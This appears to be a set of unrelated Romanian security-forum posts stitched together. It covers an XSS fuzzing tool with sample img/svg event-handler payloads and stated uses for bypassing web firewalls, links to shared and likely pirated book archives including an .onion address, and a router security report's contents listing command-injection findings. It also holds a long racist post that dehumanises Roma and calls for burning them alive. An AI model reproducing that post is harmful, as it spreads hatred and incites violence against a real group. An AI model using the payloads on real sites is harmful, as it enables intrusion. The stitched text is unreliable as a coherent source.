Leaderboard

What is XSS Fuzzer? XSS Fuzzer is a simple application written in plain HTML/JavaScript/CSS which generates XSS payloads based on user-defined vectors using multiple placeholders which are replaced with fuzzing lists. It offers the possibility to just generate the payloads as plain-text or to execute them inside an iframe. Inside iframes, it is possible to send GET or POST requests from the browser to arbitrary URLs using generated payloads. Why? XSS Fuzzer is a generic tool that can be useful for multiple purposes, including: Finding new XSS vectors, for any browser Testing XSS payloads on GET and POST parameters Bypassing XSS Auditors in the browser Bypassing web application firewalls Exploiting HTML whitelist features Example In order to fuzz, it is required to create placeholders, for example: The [TAG] placeholder with fuzzing list img svg. The [EVENT] placeholder with fuzzing list onerror onload. The [ATTR] placeholder with fuzzing list src value. The payloads will use the mentioned placeholders, such as: <[TAG] [ATTR]=Something [EVENT]=[SAVE_PAYLOAD] /> The [SAVE_PAYLOAD] placeholder will be replaced with JavaScript code such as alert(unescape('[PAYLOAD]'));. This code is triggered when an XSS payload is successfully executed. The result for the mentioned fuzzing lists and payload will be the following: <img src=Something onerror=alert(unescape('%3Cimg%20src%3DSomething%20onerror%3D%5BSAVE_PAYLOAD%5D%20/%3E')); /> <img value=Something onerror=alert(unescape('%3Cimg%20value%3DSomething%20onerror%3D%5BSAVE_PAYLOAD%5D%20/%3E')); /> <img src=Something onload=alert(unescape('%3Cimg%20src%3DSomething%20onload%3D%5BSAVE_PAYLOAD%5D%20/%3E')); /> <img value=Something onload=alert(unescape('%3Cimg%20value%3DSomething%20onload%3D%5BSAVE_PAYLOAD%5D%20/%3E')); /> <svg src=Something onerror=alert(unescape('%3Csvg%20src%3DSomething%20onerror%3D%5BSAVE_PAYLOAD%5D%20/%3E')); /> <svg value=Something onerror=alert(unescape('%3Csvg%20value%3DSomething%20onerror%3D%5BSAVE_PAYLOAD%5D%20/%3E')); /> <svg src=Something onload=alert(unescape('%3Csvg%20src%3DSomething%20onload%3D%5BSAVE_PAYLOAD%5D%20/%3E')); /> <svg value=Something onload=alert(unescape('%3Csvg%20value%3DSomething%20onload%3D%5BSAVE_PAYLOAD%5D%20/%3E')); /> When it is executed in a browser such as Mozilla Firefox, it will alert the executed payloads: <svg src=Something onload=[SAVE_PAYLOAD] /> <svg value=Something onload=[SAVE_PAYLOAD] /> <img src=Something onerror=[SAVE_PAYLOAD] /> Sending requests It is possible to use a page vulnerable to XSS for different tests, such as bypasses for the browser XSS Auditor. The page can receive a GET or POST parameter called payload and will just display its unescaped value. Contact The application is in beta state so it might have bugs. If you would like to report a bug or provide a suggestion, you can use the GitHub repository or you can send me an email to contact [a] xssfuzzer.com. Link: https://xssfuzzer.com/

Pare sa fie o vulnerabilitate Remote Command Execution. Daca e Drupal, poate sa fie Drupalgedon.

Multumesc pentru documentatie! Cand am spus "Ethical Hacking(Gray Hat)" am facut o greseala de exprimare, ar fi trebuit sa spun si gray hat

Una dintre cele mai bine pregatite prezentari de la BSides, felicitari Nytro si mult succes in continuare.

Salut si bine ai venit! Ce te intereseaza mai exact? Ethical Hacking e white hat. Grey hat este cumva la granita dintre white si black, o combinatie intre cele doua. Detalii despre white, black, grey, aici. Pe astea le-am gasit cautand pe Google. Pe partea de web security poti sa incerci hacker101 si pwnthecode, cel din urma fiind un proiect RST. Iar mai jos ai carti, resurse/materiale pentru o viata: https://mega.nz/#F!8G4wxSrJ!m7LX9z4a3Zxbpw62q9ZFSQ - infosec PDF https://mega.nz/#F!8EdEmZSI!OHRaksNSZYpSKLMUnrOelQ - Infosec PDF https://mega.nz/#F!VpZSjbbR!T8HXLl20No0LDP8OTIYZAg - old hacking/pentesting courses & books 2003-2012 http://www.ytxmrc3pcbv5464e.onion/files/ https://repo.zenk-security.com http://index-of.es https://github.com/vhf/free-programming-books/blob/master/free-programming-books.md#professional-development - programming books https://github.com/Hack-with-Github/Free-Security-eBooks 500 GB programming resources: https://drive.google.com/drive/folders/0ByWO0aO1eI_MN1BEd3VNRUZENkU https://drive.google.com/drive/folders/0B6e-S9ckSvFSdE5MaXRiaWIwbGc https://drive.google.com/drive/folders/1O2cqrDEdX_1Vag9wWQC6ovBgeoXDk0BB https://mega.nz/#F!NAZwVILa!U15d9WY-uy4bg0tjUYGQEA - programming books http://www.oreilly.com/programming/free/ http://books.goalkicker.com

Bestseller.md - Au o sectiune cu ebook-uri gratis, destul de multe. 850 Carti .mobi - Archive.org (Poti cauta pe acest site, vei gasi foarte multe carti)

"Supported file types : pdf,txt,doc,ppt,xls,docx and more."

Nu. Citesc foarte rar pe metrou.

Router-ul Connect Box de la UPC, cel putin al meu, este Compal CH7465LG, software version CH7465LG-NCIP-4.50.18.20-NOSH. M-am apucat de ceva teste pe el si se pare ca SEARCH-LAB a facut o analiza de securitate foarte detaliata, incluzand atat componentele software (network, software, web) cat si hardware, pe Compal CH7465LG-LC Modem/Router CH7465LG-NCIP-4.50.18.13-NOSH. O scurta descriere puteti gasi aici, dar pierdeti toata distractia si informatia: https://www.exploit-db.com/exploits/40159/ Raportul complet, format PDF, este aici: http://www.search-lab.hu/media/Compal_CH7465LG_Evaluation_Report_1.1.pdf Daca nu v-am convins, uite asa arata cuprinsul: 1 Executive Summary............................................................................................................................ 5 2 Introduction ....................................................................................................................................... 8 2.1 Foreword ................................................................................................................................. 8 2.2 Scope ....................................................................................................................................... 8 2.3 Document overview ................................................................................................................ 8 2.4 Version history ........................................................................................................................ 9 3 Test Environment............................................................................................................................. 10 3.1 Samples and other deliveries................................................................................................ 10 3.1.1 Unique identification and version numbers..................................................................... 10 3.1.2 Design ............................................................................................................................... 10 3.1.3 Components...................................................................................................................... 12 3.1.4 Interfaces.......................................................................................................................... 16 3.2 Documentation and other information................................................................................. 18 3.2.1 Generic and chipset-specific information......................................................................... 18 3.2.2 ToE-specific information................................................................................................... 18 3.3 Tools and testing equipment................................................................................................. 19 3.3.1 Hardware tools ................................................................................................................. 19 3.3.2 Software tools................................................................................................................... 19 4 Security Evaluation........................................................................................................................... 20 4.1 External interfaces................................................................................................................. 20 4.1.1 Front panel buttons and LEDs........................................................................................... 20 4.1.2 RF cable interface with DOCSIS......................................................................................... 21 4.1.3 Telephone connectors...................................................................................................... 21 4.1.4 Ethernet interfaces........................................................................................................... 21 4.2 Internal interfaces................................................................................................................. 21 4.2.1 Flash interfaces................................................................................................................. 22 4.2.2 EEPROM interface............................................................................................................. 22 4.2.3 Local memory interface .................................................................................................... 22 4.2.4 PCIe ................................................................................................................................... 22 4.2.5 UART of the Wi-Fi SoC (J15).............................................................................................. 23 4.2.6 UART of the Main SoC (J23).............................................................................................. 23 4.3 System software.................................................................................................................... 23 4.3.1 Flash contents of the main SoC ........................................................................................ 23 4.3.2 Shells of Main SoC............................................................................................................. 25 4.3.3 Shell of Wi-Fi SoC.............................................................................................................. 28 4.3.4 Shell access in Main SoC ................................................................................................... 29 4.4 Security of the network interfaces........................................................................................ 30 4.4.1 Service discovery .............................................................................................................. 30 4.4.2 Web Server ....................................................................................................................... 33 4.4.3 Web GUI............................................................................................................................ 38 Project work ID: P15- 4.4.4 UPnP.................................................................................................................................. 50 4.4.5 SNMP ................................................................................................................................ 50 4.4.6 RPC.................................................................................................................................... 52 4.4.7 Wi-Free ............................................................................................................................. 57 4.5 Security of the sensitive assets ............................................................................................. 59 4.5.1 Web interface credentials................................................................................................. 59 4.5.2 Wi-Fi credentials............................................................................................................... 60 4.5.3 WPS................................................................................................................................... 60 4.5.4 Security of the backup/restore functionality.................................................................... 61 4.5.5 DOCSIS credentials............................................................................................................ 62 5 Conformance to Requirements........................................................................................................ 64 5.1 Security checklist................................................................................................................... 64 6 Evaluation Results............................................................................................................................ 68 6.1 Findings and recommendations............................................................................................ 68 6.1.1 Serial interface was open on the Main SoC...................................................................... 68 6.1.2 Serial interface was open on the Wi-Fi SoC...................................................................... 68 6.1.3 Bootloader menu was accessible on the Main SoC UART ................................................ 68 6.1.4 Bootloader menu was accessible on the Wi-Fi SoC UART................................................ 69 6.1.5 cbnlogin could cause arbitrary code execution................................................................ 69 6.1.6 Unnecessary services were running on the Main SoC...................................................... 69 6.1.7 Buffer overflow in the Web server HTTP version field ..................................................... 69 6.1.8 HTTPS support was disabled on the Web server.............................................................. 70 6.1.9 Hard-coded private key was used for HTTPS.................................................................... 70 6.1.10 Hard-coded private key could be downloaded from the Web interface without authentication............................................................................................................................... 70 6.1.11 HTTPS certificate could be used to impersonate any web site ........................................ 70 6.1.12 Sensitive information disclosure....................................................................................... 71 6.1.13 Unauthenticated remote DoS against the device............................................................. 71 6.1.14 Super and CSR users could not be disabled...................................................................... 71 6.1.15 Attacker could change first installation flag ..................................................................... 72 6.1.16 Password brute-force protection was not active ............................................................. 72 6.1.17 Password brute-force protection could be bypassed....................................................... 72 6.1.18 The user of the modem might steal or replace the DOCSIS credentials .......................... 72 6.1.19 Unauthenticated remote command injection in ping command..................................... 73 6.1.20 Authenticated remote command injection in tracert command ..................................... 73 6.1.21 Unauthenticated remote command injection in stop diagnostic command ................... 73 6.1.22 Remote DoS with stop diagnostic command.................................................................... 73 6.1.23 Buffer overflow in stop diagnostic command................................................................... 74 6.1.24 Authenticated remote command injection with e-mail sending function ....................... 74 6.1.25 Session management was insufficient.............................................................................. 74 6.1.26 CSRF protection could be bypassed.................................................................................. 75 6.1.27 Unauthenticated DoS against Wi-Fi setting modification ................................................ 75 6.1.28 Unauthenticated DoS against the Wi-Fi functionality ...................................................... 75 6.1.29 Unauthenticated changes in WPS settings....................................................................... 75 6.1.30 Unauthenticated local command injection with RPC on Main SoC.................................. 76 6.1.31 Unauthenticated local command injection with RPC on Wi-Fi SoC.................................. 76 6.1.32 Buffer overflow in the Wi-Fi SoC RPC implementation .................................................... 76 6.1.33 Hard-coded keys were used to encrypt the backup file ................................................... 77 6.1.34 UPC Wi-Free network interface was accessible on the Wi-Fi SoC.................................... 77 6.1.35 Backup/restore interface allowed remote reconfiguration without authentication....... 77 6.2 Risk Analysis .......................................................................................................................... 78 7 References........................................................................................................................................ 81 Appendix A Certificate used for HTTPS.............................................................................................. 82 Appendix B Private key used for HTTPS ............................................................................................ 83 Appendix C Serial console on J15 ...................................................................................................... 85 Appendix D Interactive shell on J15................................................................................................... 87 Appendix E Serial console on J23 ...................................................................................................... 91 Appendix F Interactive boot shell on J23 .......................................................................................... 96

Auzi, nenea, mamaia ta e tigan ? )))) - Cati Romani cu palate vezi ? - Cum poti admite ca o cioara fara ocupatie si fara meserie, fost sclav la origine pe plantatiile de bumbac are PALAT si e plin de aur? E nevoie sa iti deseneze oamenii ca veniturile lui sunt ilicite? - Cati tigani lautari contribuie la stat cu taxe si impozite ? Te-ai intrebat vreodata ca in urma neplatii impozitelor are de suferit un popor intreg ? (citeste despre inflatie si cauzele ei) - Cati c?cati de tigani care nu stiu sa scrie sau sa citeasca au permis de conducere in Tara Româneasca ? Oare cum o fi luat proba de legislatie ? - Cati tigani ai vazut sa se trezeasca la ora 6, sa bea o cafea infecta si slaba precum un ceai de sireturi si sa plece la serviciu pentru 130 de euro/lunar (600 roni) ? - Cate corturi cu Români ai vazut in Franta, Belgia, Olanda, Germania, Danemarca ... ? Sau cati cersetori Români ? - Nu te doare inima cand treci cu bicicleta pe langa o cioara semi-analfabeta care este la volanul unui Mercedes, timp in care tu ai stat 5 ani la facultate, cate 10-12 ore pe zi? (de multe ori nemancat si fara un leu nenorocit in buzunar) - Arata-mi si mie o bâhnita de cioara cu masterat; Eu stiu Români care mergeau la facultate si nu aveau bani nici macar sa-si cumpere un covrig comunist. Oare ei de ce nu s-au apucat de furturi, talharii ? Iti spun eu: Ciorile au genetic asta si ar trebui deportate in Siberia sau batute in cuie pe gard si pârjonite de vii cu arzatorul. - Unde sloboz sunt tiganii discriminati in Romania ? Nu cumva sunt discriminati Românii? Prima lege care s-a dat in România de catre Ion Iliescu, a fost "sa se dea aurul inapoi tiganilor". Cum inapoi ? De unde il aveau daca ei au fost sclavi pana in 1956?! Au spus ca aurul a fost mostenire; mostenire de la cine ? Tiganii erau Sclavi in Tara Româneasca inca din 1240! "Elementele neromanesti sa-si dea seama ca aici nu este o tara oarecare, ci este mosia unui neam" - Nicolae Iorga. Daca vrei, iti si desenez. Cel mai cinstit tigan, e tiganul mort. (ala cu toporul infipt in cap)

20 ron bucata si te ajut eu, cristianul74@gmail.com